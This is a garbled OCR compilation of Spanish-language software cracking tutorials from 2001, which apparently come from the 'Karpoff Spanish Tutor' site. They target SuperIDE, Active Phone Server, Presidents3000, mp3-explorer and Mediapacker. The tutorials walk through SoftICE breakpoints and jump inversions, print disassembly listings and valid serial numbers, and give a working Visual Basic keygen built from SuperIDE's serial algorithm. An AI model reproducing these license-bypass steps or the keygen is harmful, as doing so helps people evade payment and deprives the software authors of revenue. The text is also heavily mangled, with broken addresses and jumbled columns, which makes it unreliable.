0157:004AAF83 MOV EDX,[EBP-0C] 

0157:004AAF86 POP EAX 

0157:004AAF87 CALL 00404004 

0157:004AAF8C INZ 004AAFA3 

0157:004AAFSE MOV EAX,[004B6AAS] - 
AAAAAAAAAAAAAÁAAAAA A AAA A AA A AMEDIAPACKER!CODE+000A9F6S AAA AAA LA LAA 


Anotamos este monton de cosas que vemos.. y salimos de SICE. 


Ingresamos lo que anotamos. yyy YY YYYYYYY YY YY Y YY YY YY YY YY Y YY YY Y YY 


YY YY YY Y YY YY Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y 


yy yy 


Mediapacker 2.0 XX] 


Thank You for Registering! 


Jeje... lo protegen empaketandolo y le dejan el serial tan facil de conseguir... jeje 
Por cierto este programa crea la siguiente clave en el registro 
HKLMISOFTWAREWMicrodreamWMediapacker12.0SeriaL 


Si quieren probar de nuevo borran el contenido de Serial y listo 


nO0TAS 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking........ 


Saludos 


Profesor_x 
KuaTo 
TurboP 
Txotxo 
[DeK_OiN] 


e Toda la gente de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


SiLvEr StOrM 


SiLvEr_StOrM_2001 Ohotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: SuperIDE vl1.2.4.186 

PROTECCION: FreeWare??? - Name/Registration Key. 

Descripción: Programa para Desarrollo Integrado de Entornos (IDE). 
Obtener Número Serie válido para registrarnos y eliminar 

OBJETIVO: y ó a E 
"Banner". Crear un Generador de Claves en Visual Basic. 

Dificultad: Novato, Facililla, Media, ETC 

DOWNLOAD: http: //protostar.hypermart.net 

E Numega Softlce 4.05, Language 2000 v4.03(0 similar), DeDe v2.50, 

Herramientas: Ñ . : 
Visual Basic 6 

CRACKER: 

FECHA: 31-03-2001 


INTRODUCCION 


SuperIDE herramienta para el Desarrollo Integrado de Entornos (IDE) en el cual se puede usar varios lenguajes de 
programacion y compiladores. Por cierto, es totalmente GRATIS!!! 


Lenguajes soportados: C/C++, ObjectPascal, x86 Assembly, Java, JavaScript, Perl, SQL, LISP, Visual Basic, INL, 
HTML (con VBScript) . 


Welcome to SuperlDE!!! 


xx, Welcome To SuperiDE 


SunerlDEis FREEWARE 


Development of SuperTDE is supported by an ad banner. Although 
SuperTDE is completely free for your use, some users may find the ad 


banner to be distracting. Therefore, for your convinience, there is a 
option to "register" SuperTDE for a nominal fee and have the ad 
banners removed. Click here for details. 


Click here to subscribe to the SuperlDE AAA A A AAA 
announcement listserv (Moderated) : Y REGISTER NOW : 


[Y Show this window the next time SuperlDE starts?? Jl Close 


NOTA: Ignorar la notificacion de GRATIS. Nos dicen que debemos PAGAR para liberarnos del molesto "Banner"! y 
para recibir el Serial ... DEBE SER ESTO UNA NUEVA DEFINICION DE GRATIS!!! ... 


Antes de comenzar el atake, hay que tener claro, las Herramientas que vamos a emplear, en esta "Victima" 
emplearemos en una primera aproximación una herramienta llamada Language 2000 Database Version 4.03, nos dirá 


si nuestra "victima" esta empaquetada, compilador, etc, ... Toda esta información nos ayudara para un atake más 
rápido. 


Pues, nada vamos al aaaaaattttttaaanaaaakkkkkkkkeeeeee 


AL ATAKE 


Arrancamos el Language 2000 Database Version 4.03 y cargamos nuestra "victima" y observamos lo siguiente en pantalla: 


$ C-MArchivos de programaiMichaelPowersiSuperlDESup... Pla ES 


— Version Information : 


Filename: [Super IDE exe 
Comments: fvebsite: http: //protostar.hypermart.net 
NN 
Product [ape 
Company: [Michael Powers Software 


— Compiler Information : 


Language: [object Pasear 
Company: [Borland International 
URL: facep:7/wwe.borland. com/delphiz 


— Compression * Encryption : 


Program: 
Company: 


Ey Run  $Y Open L/ View f OnTop LA About 
Database Version 4.03 - Last update on Wednesday, August 23, 2000 


> 


Pues, ya esta, nos dice que el SuperIDE esta Compilado en Borland Delphi. 


El siguiente paso será, emplear la herramienta DeDe v2.50 un excelente Desensamblador para Delphi, bien ejecutamos el Dede y 
seleccionamos nuestra "victima" - SuperIDE y pulsamos el botón [Process] esperamos hasta que nos aparezca el mensaje "Dump 
successfull !:)'"" y observaremos lo siguiente: 


¿DeDe y2.50 (c) 1999-2001 by DaFixer 
File Dumpers Tools Options ¿About 


[EXArchivos de programa+MichaelPowerstSu y] | Process | nero] 


AAA A TO 
[ Classes Info | Units Info | Forms | Procedures | Project | Exports | 


Pasame Tiene Tseire > Tormo Ta] Version: BC84 


Dede Unit List [from PACKAGEINFO) 


Dump successful ! :] 


O04554EC 0000000 
0058200C 00000000 
D0580F48 — 00000000 
D0581FC8 — DO000000 
DOS580F60 00000000 
00579000 00000000 
ad FáhetractFrror ANA7TARTA OOOO 


Thinking ... ¡SuperlDE.exe (2604544 bytes | 


La siguiente aproximación, será ¿Por donde empezamos a tracear? Pues, muy fácil, si nos fijamos en el proceso que sigue para 
registrarnos, el propio programa "victima" nos da la respuesta. Primero nos aparecerá la típica pantalla de Registración SuperIDE 


Registration con dos botones, [Register] y [Cancel], pulsamos el botón [Register] y nos aparecerá la ansiada pantalla de 
"Registration" pidiéndonos, lo siguiente: 


¿2 Reyister SuperiDE 


Registration for SuperlDE is totally optional. 

SuperlDE ¡s primarily supported by an adbar, but some users would rather not have 
this sometimes distracting element. Therefore, for those who wish, there is an option 
to have the ads removed by paying a small fee to make up for the lost revenue. 

Click on the button below to obtain a registration code, and once you have you 

can enter it here and register this copy. Upgrades are free for minor version numbers, 
for example, upgrading from version 1.4 to 1.6 would be free, but upgrading from 

1.4 to 2.1 would require an upgrade in registration. 


NOTE: IT IS ILLEGAL TO USE YOUR REGISTRATION NAME 4ND¿OR CODE ON 
MORE COMPUTERS THAN YOU HAWE PURCHASED LICENSES FOR. SEE 
LICENSE.TXT FOR DETAILS. 


177 Go to the registration site | 


Name: fueras... 
Serial Number-j9ss656394 


Y coa 


STATUS: UNREGISTERED 


SoftICE - Estudiar Generación Serial para *FREGISTRARNOS* 


Name: +ErCOser 
Serial: 999666999 ...... Serial Dummy 


Ejecutamos de nuevo el programa 'victima' previamente cargado nuestra herramienta favorita SoftICE (cual sino:)) 


Repetiremos los pasos para Registrarnos y antes de pulsar el botón [OK], retornamos al SI (SoftICE) pulsando (Ctrl-D) y 
establecemos el BreakPoint 


:BPX HmemCpy 
Retornamos al programa "victima' pulsando (Ctrl-D) pulsamos el botón [OK]. 


Pantallazo, aparecemos en el SI, pulsamos [F12] y [F11] para tracear el Serial introducido, visualizando la siguiente 
información: 


mn KERNEL'LOGERROR+0123 eocconomocacamnnmmnnmnmnmmnmnmmmmmas 
015F:9EA3 CA0800 RETF 0008 

KERNEL ! HIMEMCPY 

015F:9EA6 55 PUSH BP <---- Aparecemos aquí 


015F:9EA7 8BEC MOV BP, SP 


015F:9F20 F36766A5 REPZ MOVSD <----— D ESI '999666999' 
015F:9F2A F367A4 REPZ MOVSB <---— ? EDI 'tamaño del Serial="9'</font"> 


[F10] traceamos, hasta llegar a lo siguiente: 


EAX=013798B4 
EDI=00000000 


Cs=0167 ¿nbspDS=0167 


*eax = 531D84 


EBX=00000000  ECX=013798B4 EDX=013798B4 ESI=008BF1A4 


EBP=008BE884 ESP=008BE848 EIP=005240C6 


*ebx = D8CA0OF9E 


*ecx = 531D84 
*edx = 531D84 


0167:00410435 
0167:0041043A 
0167:0041043D 
0167:0041043F 
0167:00410441 
0167:00410442 
0167:00410448 
0167:0041044B 
0167:0041044E 
0167:00410451 
0167:00410457 
0167:0041045C 
0167:0041045F 
0167:00410461 
0167:00410462 
0167:00410467 
0167:0041046A 
0167:0041046F 
0167:00410472 
0167:00410474 
0167:0041047A 
0167:0041047B 
0167:00410480 
0167:00410483 
0167:00410486 


E8367E1200 call 00538270 

8D4DF4 lea ecx, [ebp-$0C] 

33D2 xor edx, edx 

8B01 mov eax, [ecx] 

50 push eax 

66C745E00800 mov word ptr [ebp-$20], $0008 
8955FC mov [ebp-$04], edx 

8D55FC lea edx, [ebp-$04] 

FF45EC inc dword ptr [ebp-$14] 
8B83C4020000 mov eax, [ebx+$02C4]<---— 'Name' 
E8147E1200 call 005382701 

8D4DFC lea ecx, [ebp-$04] 

8B01 mov eax, [ecx] 

50 push eax 


Ss=016F ES=016F FS=392F GS=0000 DS:01379B74=00000000 


BABDF35A00 mov edx, $005AF3BD<---— 'Registered User' 


8D45F8 lea eax, [ebp-$08] 
E871311800 call 005935E0 
FF45EC inc dword ptr [ebp-$14] 
8B08 mov ecx, [eax] 


8B83EC020000 mov eax, [ebx+$02EC]<----— 'Serial' 
5A pop edx 
E864A80300 call 0044ACE4<---- BPX $0167:0041047B 


FF4DEC dec dword ptr [ebp-$14] 
8D45F4 lea eax, [ebp-$0C] 
BA02000000 mov edx, $00000002 


1 En la primera fase del traceo, cuando llegamos a esta CALL, retornamos 


KERNEL ! LOGERROR+0123 


y comenzamos el rastreo del Serial. Seguimos traceando con [F10] y 


antes de llegar a la dirección :0041047B establecemos un BPX 0041047B cuando nos 
posicionamos en esta CALL pulsamos dos veces [F10] y pantallazo, 
programa "victima", mostrandonos el MENSAJE DE ERROR pulsaremos el botón [OK] 


retornaremos al SoftICE, 


seleccionamos 


aparecemos en el 


nos posicionamos en EDX con el botón derecho del ratón, 


"Display" nos movemos hacia arriba [Alt] [PgUp] en la Pantalla de Datos 
hasta observar, lo siguiente: 


Name: +Erfiser 


Serial: 83972826 


Introducimos el Serial 83972826 para el Name HE, Y (d Ser y voilá, nos aperecerá el 


mensaje 


SuperlDE XK] 


Registration Successful. Keep your username and serial number in a safe location: in 
the event the software must be re-installed, the data will be required agair. 


"SuperIDE Registration Successfull!" 


(D) DeDe v2.50 - Estudio de la Rutina de Generación del Key 


Name: +ErO ser 
Serial: 999666999 <..... Serial Dummy 


|- SuperIDE.exe.dpr code -— 
[-] TRegDlg.RegisterBtnClick 


100410530 50 push eax 


¡* Reference to : TWelcomeBox.-“PROC-00410410 () 
00410531 E8DAFEFFFF call 00410410 
00410536 59 pop ecx 

00410537 C3 ret 


¡A A PROC-00410410 () 
00410410 55 push ebp 

00410411 8BEC mov ebp, esp 

00410413 83C4D0 add esp, -$30 

00410416 B838F65A00 mov eax, $005AF638 

0041041B 53 push ebx 

0041041C 8B5D08 mov ebx, [ebp+5$08] 


0041041F E8608C1700 call 00589084 
00410424 33D2 xor edx, edx 

00410426 8955F4 mov [ebp-$0C], edx 
00410429 8D55F4 lea edx, [ebp-$0C] 
0041042C FF45EC inc dword ptr [ebp-$14] 


* Reference to control RegSNEdt : TEdit 


0041042F 8B83C8020000 mov eax, [ebx+$02C8] 


00410435 E8367E1200 call 00538270 

0041043A 8D4DF4 lea ecx, [ebp-$0C] 

0041043D 33D2 xor edx, edx 

0041043F 8B01 mov eax, [ecx] 

00410441 50 push eax 

00410442 66C745E00800 mov word ptr [ebp-$20], $0008 
00410448 8955FC mov [ebp-$04], edx 

0041044B 8D55FC lea edx, [ebp-$04] 

0041044E FF45EC inc dword ptr [ebp-$14] 


0041047A 


0041047B 
00410480 
00410483 
00410486 


10041048B 
00410490 
100410493 
00410496 


10041049B 
004104A0 
1004104A3 
004104A6 


004104AB 
(004104B0 
004104B3 
/'004104BA 
004104BB 
004104BD 
1004104BE 


l* Reference to 


¡* Reference to control RegNameEdt 


00410451 8B83C4020000 mov eax, 


¡* Possible String Reference to: 


00410462 BABDF35A00 mov edx, 
[00410467 8D45F8 lea eax, 


¡* Reference to control AppRegisterl 


100410474 8B83EC020000 mov eax, 


5A pop edx 


E864A80300 
FF4DEC dec 
8D45F4 lea 
BA02000000 


E898321800 
FF4DEC dec 
8D45F8 lea 
BA02000000 


E888321800 
FF4DEC dec 
8D45FC lea 
BA02000000 


E878321800 
8B4DDO mov 


00410457 E8147E1200 call 00538270 
[0041045C 8D4DFC lea ecx, 
0041045F 8B01 mov eax, 
00410461 50 push eax 


[ebp-$04] 
[ecx] 


$005AF3BD 
[ebp-$08] 


/0041046A E871311800 call 005935E0 
0041046F FF45EC inc dword ptr [ebp-$14] 
00410472 8B08 mov ecx, 


[eax] 


call 0044ACE4 
dword ptr [ebp-$14] 
eax, [ebp-$0C] 
mov edx, $00000002 


call 00593728 
dword ptr [ebp-$14] 
eax, [ebp-$08] 
mov edx, $00000002 


call 00593728 
dword ptr [ebp-$14] 
eax, [ebp-$04] 
mov edx, $00000002 


Call 00593728 
ecx, [ebp-$30] 


64890D00000000mov fs: [$0000], 


5B pop ebx 


8BE5 mov esp, 


5D pop ebp 
C3 ret 


Para no hacer este Manual un "peñazo" 
¡Generación del Serial: 


ebp 


1 Recorre desde el 1? caracter hasta el último del Name, 
Posición de cada caracter del Name 


jejeje;), 


TEdit 


[ebx+$02C4] 


'Registered User' 


TAppRegister 


[ebx+$02EC] 


TAppRegister.RegisterApp () 


ecx 


os voy a RESUMIR el proceso de 


guardando la 
FOR i=1 TO Len (Name) 


2 Multiplica N”* Mágico 76EFh (=30447) por la Posición de cada caracter 
y por su valor ASCII hasta finalizar el recorrido del Name. 


3 y Acumulamos el Resultado, y voilá ... obtenemos el SERIAL! 


About this program... 


« SuperlDE 


Proyram Factory!!! 
1.42.186 


Michael Powers, 91998 ALL RIGHTS RESERVED 


Registration Information 


Register to stay current with SuperlDE!! E E 
Join the SuperlDE mailing list to recievye Registration removes the adbar from 
updates, tips, tricks, news, etc. the application 


Click Here. 
Status: REGISTERED! 3) 
POWERED Name: +Er(dser 


2 EH Borland Serial Number: 83972826 
243 Builder 
Go to to the registration site | 
SuperlDE Home Page 


Send a suggestion / bug report 


' Nombre : SuperIDE v1.2.4.186 Keygenerator 
' Autor : +ErOser'2000 [fOR tHE nEW mILLENNIUM] 
' Creado : Sabado, Marzo 31,2001 E 00:45:22 pm (Vers: 1.0.0000) 
' Herramientas: Softlce 4.05, Visual Basic 6 


' Descripción : SuperIDE v1.2.4.186 


Private Sub Text1_Change() 
Dim user_name As String 
Dim L As Integer, x As Integer, posicion as Integer 
Dim magico As Double, key As Double 
Const numero As Double = £H76EF 


user_name = Trim$(Text1.Text) 'quitamos blancos 

L = Len(user_name) 

x=0 
For x=1 To L 
posicion = x 'nos guardamos la posición. 
magico = posicion * numero 'multiplicamos la posicion x n?magico (76EFh) 
user_name = Asc(Mid$(Textl.Text, x, 1)) * magico 

key = key + user_name 

Next x 
Text2.Text = key 'Visualizamos el Serial 
End Sub 


Un Saludo! 


+Erfser'2000 
fOR tHE nEW mILLENNIUM 


==/X/X/- Your Mind Is the Power -—/X/X/=- 


si + Agradecimientos t----- - 
Karpoff, Demian, Black Fenix, Prffesor X, Numit_oR, Esiel 2, Mr. Crimson, Mr. WhiTe, Mr. 
GReeN, TNT, WKT, KUT y a TODOS los CrAcKeRs del Pasado, Presente y Futuro. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
Active Phone Server v9.13 


Serial. 


Registrar el programa como sea :) 


Newbie 


http: //www.softcab.com 


file insPEctor, Softl CE 
Act Mago FECHA: 15/04/2001 


INTRODUCCION 


Hola amigos, presento mi vigésimo primer tutorial. Ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoO' hotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 


En este tutorial usaremos el Softl CE. Si no lo tienes instalado puedes bajártelo en www.crackstore.com . Asumo que 


tienes conocimientos básicos sobre su uso. Y para terminar con la INTRO debo decir : ESTE TEXTO HA SIDO 
ESCRITO SÓLO CON PROPÓSITOS EDUCACIONALES. 


AL ATAKE 


Comentario del Programa 


Programa que sirve para manejar las llamadas telefónicas. 


Lo que nos interesa... el programa es distribuido como shareware con libre evaluación de 30 días, y para 
seguir utilizando el programa después de este período debes registrarte y para eso debes pagar la suma de ? 


Contamos con Softl CE :) ... 


| Manos a la Obra | 


Antes de abrir el programa lo analizamos con file insPEctor v3.5 el que nos mostrará información realmente 


importante a la hora de atacar el programa; bueno el file insPEctor nos mostrará los siguientes datos: 


Mmm, esta vez me ha fallado la opción que dice Compilador, dice: No encontrado :(, pero si vamos a la 
opción Secciones, podemos deducir que está empacado con UPX :), pero esto no importará para nada a la 
hora de crackear este programa, por que el método que usaremos es bastante especial, debido al débil 
sistema de protección del programa :) 


A continuación... cerramos file insPEctor v3.5 y abrimos Active Phone Server v9.13 


Abrimos el programa, presionamos el botón > luego le damos click a About... y abajo del rectángulo 
está el botón Enter the registration key, lo presionamos y por fin estaremos en la caja de registro, la que 
nos pide los siguientes datos: 


Your name: 
Key: 


Como hacemos siempre llenamos la caja con cualquier dato, le damos click a Enter y por supuesto que el 
programa no aceptará el código de registro y nos mostrará un mensaje como este... 


Registration 


ou have entered wrong key. 


Please try again. 


A continuación... cerramos Active Phone Server v9.13 


| Usando el SoftlCE | 


Asumo que tienes bien configurado el Softl CE y que tienes al menos conocimientos básicos sobre su uso. 


A continuación...abrimos Active Phone Server y vamos directamente a la caja de registro en donde 
introducimos nuestro nombre, y cualquier código de registro. Todavía no damos click en Enter ; lo que ahora 
debemos hacer es presionar CONTROL+D para que salte el Softl CE y así poder colocar nuestro breakpoint. 


Ya estamos dentro del Softl CE...colocamos bpx hmemcpy y presionamos ENTER, luego presionamos F5 


para salir del Softl CE. Ahora le damos click a Enter y si todo sale bien el bpx debería picar y hace saltar al 
Softl CE. 


Luego presionamos F11 1 vez y F12 8 veces para caer aquí... (asegúrate que KERNEL pase a USER (04) ) 


:10016CB4 8D8C2410040000 E ECX, [ESP+00000410] <== caemos aquí, seguimos con F10 


Luego de caer ahí, le damos a F10 20 veces para caer aquí... 


:10016CFF 8D942410040000 EDX, [ESP+00000410] 
:10016D06 51 ECX 

:10016D07 52 EDX 

:10016D08 E873FCFFFF 10016980 


:10016D0D 83C408 ESP, 08 
:10016D10 85C0 EAX, EAX 
:10016D12 0F84E2800000 10016DFA <== aquí invertimos el salto con r fl z 


Luego de darle 20 veces a F10 caemos en el salto 10016D12 y aquí invertimos el salto con el comando r fl z, 
luego presionamos F5 y vemos esto... 


Registration 


hank you for your support! 


Mmm, nos hemos registrado pero quizás sólo hasta reiniciar el programa supongo, como pasa casi siempre 
cuando usamos este comando (r fl z) ya que el cambio se produce sólo en memoria, pero ha sucedido algo 
que no hemos visto, en la carpeta donde está instalado el programa se ha creado un archivo llamado 


Aon. key y si reiniciamos el programa este estará registrado con nuestro nombre de usuario, entonces eso 
quiere decir que una vez que ha entrado el registro no hay vuelta que darle. :) 


Programa crackeado... 


Nota: 


Soy humano y cometo errores, si encuentras uno házmelo saber OK. actmagoO hotmail.com 


| Saludos | 


e PrOfEsOr X ( my best friend ) 
e [KRaViTZ] ( suerte amigo ) 
e [ DeK_OIiN ], Txeli, CODE_MEX, Metamorfer, Txotxo, Raziel 


e Karpoff http: //welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers.ws 


e ViPER ( creador de file insPEctor ) file insPEctor web site http: //www.finspec. swsites.net/index. htm 


e Toda la people de TUTORIALES 2001 
e LdA 42A 2000 For Ever!! :) 


e Saludos a todos los crackers del mundo. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
Presidents3000 v1.0.1 


Serial. 


Conseguir un código de registro válido 


Newbie 


http: //www.winograd.com 


file insPEctor, Softl CE 
Act Mago FECHA: 15/04/2001 


INTRODUCCION 


Hola amigos, presento mi vigésimo segundo tutorial. Ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoO' hotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 


En este tutorial usaremos el Softl CE. Si no lo tienes instalado puedes bajártelo en www.crackstore.com . Asumo que 


tienes conocimientos básicos sobre su uso. Y para terminar con la INTRO debo decir : ESTE TEXTO HA SIDO 
ESCRITO SÓLO CON PROPÓSITOS EDUCACIONALES. 


AL ATAKE 


Manos a la Obra 


Antes de abrir el programa lo analizamos con file insPEctor v3.5 el que nos mostrará información realmente 
importante a la hora de atacar el programa; bueno el file insPEctor nos mostrará los siguientes datos: 


e El programa está desarrollado en Microsoft Visual C++ 5.0 
e No está empacado 


A continuación... cerramos file insPEctor v3.5 y abrimos Presidents3000 v1.0.1 


Abrimos el programa, le vamos al menú: File > Register... y nos encontramos con la caja de registro, la que 
nos pide los siguientes datos: 


Name: 
SerialHt: 


Como hacemos siempre llenamos la caja con cualquier dato, le damos click a Register y por supuesto que el 
programa no aceptará el código de registro y nos mostrará un mensaje como este... 


Presidents3000 


Sorry! Registration not accepted. Please re-enter the required information exactly as 


received. 


A continuación... cerramos Presidents3000 v1.0.1 


| Usando el SoftlCE | 


Asumo que tienes bien configurado el Softl CE y que tienes al menos conocimientos básicos sobre su uso. 


A continuación...abrimos Presidents3000 y vamos directamente a la caja de registro en donde introducimos 
nuestro nombre, y cualquier código de registro. Todavía no damos click en Register ; lo que ahora debemos 
hacer es presionar CONTROL+D para que salte el Soft! CE y así poder colocar nuestro breakpoint. 


Ya estamos dentro del Softl CE...colocamos bpx hmemcpy y presionamos ENTER, luego presionamos F5 para 
salir del Softl CE. Ahora le damos click a Enter y si todo sale bien el bpx debería picar y hace saltar al Softl CE. 


Luego presionamos F11 1 vez y F12 8 veces para caer aquí... 


:00406E42 8D54240C LEA EDX, [ESP+0C]<== caemos aquí, seguimos con F10 
:00406E46 6A1E PUSH  0000001E 

:00406E48 52 PUSH  EDX 

:00406E49 68ED030000 PUSH  000003ED 

:00406E4E 53 PUSH  EBX 

:00406E4F FFD6 CALL  ESI 

:00406E51 8D44240C EA EAX, [ESP+0C] 

:00406E55 8D8C248C000000 EA ECX, [esp+0000008C] 

:00406E5C 50 PUSH  EAX <== d eax = nuestro número de serie falso 
:00406E5D 51 PUSH  ECX <== d ecx = nuestro nombre 

:00406E5E E89D020000 CALL 00407100 <== entramos con F8 

:00406E63 830408 ADD ESP, 00000008 

:00406E66 663D0100 CMP AX, 0001 

:00406E6A 0F85A7000000  JNZ 00406F17 <== con rfl z nos muestra el mensaje de registro aceptado 
:00406E70 8D94240C010000 LEA EDX, [ESP+0000010C] 


Entramos en la CALL 00406E5E con F8, para caer aquí... 


:00407100 8B4C2404 MOV ECX, [ESP+04] <== caemos aquí, seguimos con F10 
:00407104 81EC80000000 SUB ESP, 00000080 

:0040710A 8D442400 LEA EAX, [ESP+00] 

:0040710E 50 PUSH EAX 

:0040710F 51 PUSH ECX 

:00407110 ESBBFEFFFF CALL 00406FDO 

:00407115 83C408 ADD ESP, 08 

:00407118 6685C0 TEST AX, AX 

:0040711B 7507 JNZ 00407124 <== nos dejamos llevar por este salto 
:0040711D 810480000000 ADD ESP, 00000080 

:00407123 C3 RET 

:00407124 53 PUSH EBX <== caemos aquí, seguimos con F10 
:00407125 56 PUSH ESI 

:00407126 8BB42490000000 MOV ESI, [ESP+00000090] 

:0040712D 8D442408 LEA EAX, [ESP+08] 

:00407131 8A10 MOV DL, [EAX] <== d eax = NUESTRO CÓDIGO DE REGISTRO VÁLIDO 
:00407133 8A1E MOV BL, [ES1I] 

:00407135 BACA MOV CL,DL 

:00407137 3AD3 CMP DL, BL 

:00407139 752F JNZ 0040716A 


Al colocar d eax en el MOV 00407131 tendremos nuestro código de registro válido, en mi caso la caja quedaría 
así... 


Name: Act MagO 
Serial: HP3KPC-99655 


Le damos click a Register y... 


Presidents3000 


Registration Accepted. Thank you very much. 


Programa crackeado... 


Soy humano y cometo errores, si encuentras uno házmelo saber OK. actmagoGU'hotmail.com 


e PrOfEsOr X ( my best friend ) 


e [KRaViTZ] ( suerte amigo ) 


[ DeK_OIN ], Txeli, CODE_MEX, Metamorfer, Txotxo, Raziel 


e Karpoff http: //welcome.to/karpoff 


e Xasx de TNT! http://www,.tntcrackers.ws 


e ViPER ( creador de file insPEctor ) file insPEctor web site http: //www.finspec. swsites.net/index. htm 


e Toda la people de TUTORIALES 2001 
e LdA 42A 2000 For Ever!! :) 


e Saludos a todos los crackers del mundo. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
Programa: [ mp3 - explorer ] v4.3.0 


PROTECCION: Serial. 

Objetivo: Encontrar el número de registro 

Descripcion: 

Dificultad: Principiante 

DOWNLOAD: http: //www.mp3-explorer.com 

Herramientas: file insPEctor v4.2001, W32Dasm v8.93, Softl CE v4.05 

CRACKER: Act Mago FECHA: 15/04/2001 


INTRODUCCION 


Hola amigos, presento mi vigésimo cuarto tutorial. Ya saben, si tienen alguna duda sólo pregúntenlo 

actmagoO' hotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 
En este tutorial usaremos el Softl CE. Si no lo tienes instalado puedes bajártelo en www.crackstore.com . Asumo que 
tienes conocimientos básicos sobre su uso. Y para terminar con la INTRO debo decir : ESTE TEXTO HA SIDO 
ESCRITO SOLO CON PROPOSITOS EDUCACIONALES. 


AL ATAKE 


Comentario del Programa 


Programa para reproducir y manejar los archivos MP3. 


Lo que nos interesa... el programa es distribuido como shareware con libre uso de 30 días, después de este 
período debes registrarte y para eso debes pagar la suma de $20 dólares. 


Pero contamos con Softl CE :)... 


| Manos a la Obra | 


Antes de abrir el programa lo analizamos con file insPEctor v4.2001 el que nos mostrará información 
realmente importante a la hora de atacar el programa; bueno el file insPEctor nos mostrará lo siguiente: 


e Compilado con Microsoft Visual C++ 5.0 
A continuación... cerramos file insPEctor v4.2001 y abrimos [ mp3 - explorer ] v4.3.0 


Abrimos el programa, nos vamos al botón ? > About [ mp3 - explorer ]... ,luego presionamos la lengúeta 
Registration y luego el botón Enter Registration Info y ahora por fin estamos en la caja de registro la que 
nos pide los siguientes datos: 


E-mail adress: 
Registration key: 


Como hacemos siempre llenamos la caja con cualquier dato, le damos click a OK y por supuesto que el 
programa no aceptará el código de registro y nos mostrará un mensaje como este... 


[ mp3 - explorer ] 


Registration info are not correct! 


Please try again. 


A continuación... cerramos [ mp3 - explorer ] y abrimos W32Dasm 


Usando el W32Dasm 


Abrimos W32Dasm y luego nos vamos a la opción Disassembler > Open File to Disassemble... buscamos 
la carpeta en donde está instalado el programa y abrimos el archivo mp3 explorer.exe 


Una vez desensamblado el archivo vamos a Refs > String Data References y buscamos aquel mensaje que 
nos decía que el registro era inválido: se verá así... 


"My favourite addresses" 

"[mp3-explorer] is shareware. Please register yo" 
"Registration Online Information" 

"Thanks for registering[| mp3-explorer]!" 
"Registration info are not correct ! Please try again." 
"You are using an unregistered copy of[ mp3 explore" 
"register.htm" 

"File '%1' not found !Do you want to refresh displayed info" 
"No predefined format found.Formats are mandatory for multi" 


Le damos click varias veces para ver cuantas referencias tiene ese string y nos encontramos con 2 
referencias. 


e La primera: 


:00401B2D EB17 


mp 00401B46 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00401AA4 (C) <=== de aquí viene 


* Possible Reference to String Resource ID=00154: "Registration info are not correct ! 
Please try again." 


:00401B2F 6894000000 push 0000009A 
:00401B34 8D4C2410 lea ecx, dword ptr [esp+10] 
:00401B38 E867330500 call 00454EA4 


La he seguido yendo al pedazo de código en que se encuentra el salto (Goto > Goto Code Location) y la he 
analizado pero cuando le ponemos un BPX al salto o a una de las CALLS que se encuentran arriba usando el 
Loader del SoftlCE y luego vamos al registro y le damos a OK, el Softl CE no rompe :(, entonces vamos a la 
segunda... 


e La segunda: 


:00405703 EB20 


jmp 00405725 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004056AF (C) <=== de aquí viene 


* Possible Reference to String Resource ID=00154: "Registration info are not correct ! 
Please try again." 


:00405705 6894000000 push 0000009A 
:0040570A 8D4C2408 lea ecx, dword ptr [esp+08] 
:0040570E E891F70400 call 00454EA4 


Ahora la vamos a seguir yendo a Goto > Goto Code Location e insertamos la dirección 004056AF, se verá 
así... 


:00405696 E8CDEFO400 call 00454668 

:0040569B B968144B00 mov ecx, 004B1468 

:004056A0 C684248400000001 mov byte ptr [esp+00000084], 01 
:004056A8 E8332E0100 call 004184E0 <=== a esta le ponemos el BPX 
:004056AD 85C0 test eax, eax 

:004056AF 7454 je 00405705 <=== aquí caemos 
:004056B1 8D4C246C lea ecx, dword ptr [esp+6C] 
:004056B5 51 push ecx 

:004056B6 B978164B00 mov ecx, 004B1678 

:004056BB E86CF30400 call 00454A2C 

:004056C0 8D542470 lea edx, dword ptr [esp+70] 
:004056C4 B974164B00 mov ecx, 004B1674 

:004056C9 52 push edx 

:004056CA E85DF30400 call 00454A2C 

:004056CFr B968144B00 mov ecx, 004B1468 

:004056D4 E8072F0100 call 004185E0 


* Possible Reference to String Resource ID=00153: 


"Thanks for registering 


[mp3-explo 


:004056D9 6899000000 push 00000099 


Le vamos a poner un bpx a la CALL 00405648 utilizando el Symbol Loader del Softl CE. 


Usando el SoftlCE 


Abrimos el Symbol Loader y vamos a File > Open Module... buscamos el ejecutable del programa, lo 
abrimos y luego vamos a Module > Load y cuando nos salga el mensaje de que ha ocurrido un error, 
seguimos adelante. 


El Softl CE romperá y en ese instante ponemos el breakpoint bpx 00405648 [ENTER] > [F5], nos saldrá el 
